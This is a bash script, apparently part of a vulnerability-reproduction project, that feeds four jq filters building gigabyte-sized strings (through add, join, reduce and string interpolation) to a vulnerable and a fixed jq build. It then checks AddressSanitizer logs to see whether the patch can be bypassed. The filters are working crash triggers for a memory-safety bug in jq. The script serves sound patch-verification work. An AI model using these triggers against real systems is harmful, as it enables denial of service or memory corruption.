#!/bin/bash
set -euo pipefail

ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
mkdir -p "$LOGS"

EXTERNAL="$ROOT/external"
VULN_BIN="$EXTERNAL/jq-vuln"
FIXED_BIN="$EXTERNAL/jq-fixed"

if [ ! -x "$VULN_BIN" ] || [ ! -x "$FIXED_BIN" ]; then
    echo "ERROR: jq binaries not found. Run repro/reproduction_steps.sh first to build them."
    exit 1
fi

run_variant() {
    local id="$1"
    local trigger="$2"
    if [ ! -f "$LOGS/${id}_vuln.txt" ] || [ ! -f "$LOGS/${id}_fixed.txt" ]; then
        echo "[*] Running $id ..."
        timeout 180 "$VULN_BIN" -n "$trigger" > /dev/null 2> "$LOGS/${id}_vuln.txt" || true
        timeout 180 "$FIXED_BIN" -n "$trigger" > /dev/null 2> "$LOGS/${id}_fixed.txt" || true
    else
        echo "[*] $id logs already present, skipping execution."
    fi
}

# Variant 1: add over array of large strings (alternate entry point to direct +)
run_variant "variant1" '["A" * 1073741824, "A" * 1073741824] | add'

# Variant 2: join over array of large strings (alternate entry point)
run_variant "variant2" '["A" * 1073741824, "A" * 1073741824] | join("")'

# Variant 3: incremental reduce building large string step-by-step
run_variant "variant3" 'reduce range(3) as $i (""; . + "A" * 1000000000)'

# Variant 4: string interpolation concatenating two large strings
run_variant "variant4" '"A" * 1073741824 as $a | "\($a + $a)"'

# Helper to safely get grep count
count_matches() {
    local file="$1"
    local pattern="$2"
    if [ -f "$file" ]; then
        local c
        c=$(grep -c "$pattern" "$file" 2>/dev/null || true)
        echo "${c:-0}" | tr -d '\n'
    else
        echo -n "0"
    fi
}

V1_VULN_ASAN=$(count_matches "$LOGS/variant1_vuln.txt" "ERROR: AddressSanitizer")
V1_FIXED_ERR=$(count_matches "$LOGS/variant1_fixed.txt" "String too long")

V2_FIXED_ERR=$(count_matches "$LOGS/variant2_fixed.txt" "String too long")

V3_VULN_ASAN=$(count_matches "$LOGS/variant3_vuln.txt" "ERROR: AddressSanitizer")
V3_FIXED_ERR=$(count_matches "$LOGS/variant3_fixed.txt" "String too long")

V4_VULN_ASAN=$(count_matches "$LOGS/variant4_vuln.txt" "ERROR: AddressSanitizer")
V4_FIXED_ERR=$(count_matches "$LOGS/variant4_fixed.txt" "String too long")

echo "[*] Results:"
echo "    Variant 1 (add)         - Vuln ASAN: $V1_VULN_ASAN, Fixed 'String too long': $V1_FIXED_ERR"
echo "    Variant 2 (join)        - Fixed 'String too long': $V2_FIXED_ERR"
echo "    Variant 3 (reduce)      - Vuln ASAN: $V3_VULN_ASAN, Fixed 'String too long': $V3_FIXED_ERR"
echo "    Variant 4 (interpolate) - Vuln ASAN: $V4_VULN_ASAN, Fixed 'String too long': $V4_FIXED_ERR"

# The fixed binary must catch all variants for the fix to be considered comprehensive.
if [ "$V1_FIXED_ERR" -ge 1 ] && [ "$V2_FIXED_ERR" -ge 1 ] && [ "$V3_FIXED_ERR" -ge 1 ] && [ "$V4_FIXED_ERR" -ge 1 ]; then
    echo "[-] NO BYPASS FOUND: All tested variant triggers are caught by the fixed build."
    exit 1
else
    echo "[+] POSSIBLE BYPASS: At least one variant reproduced on the fixed build."
    exit 0
fi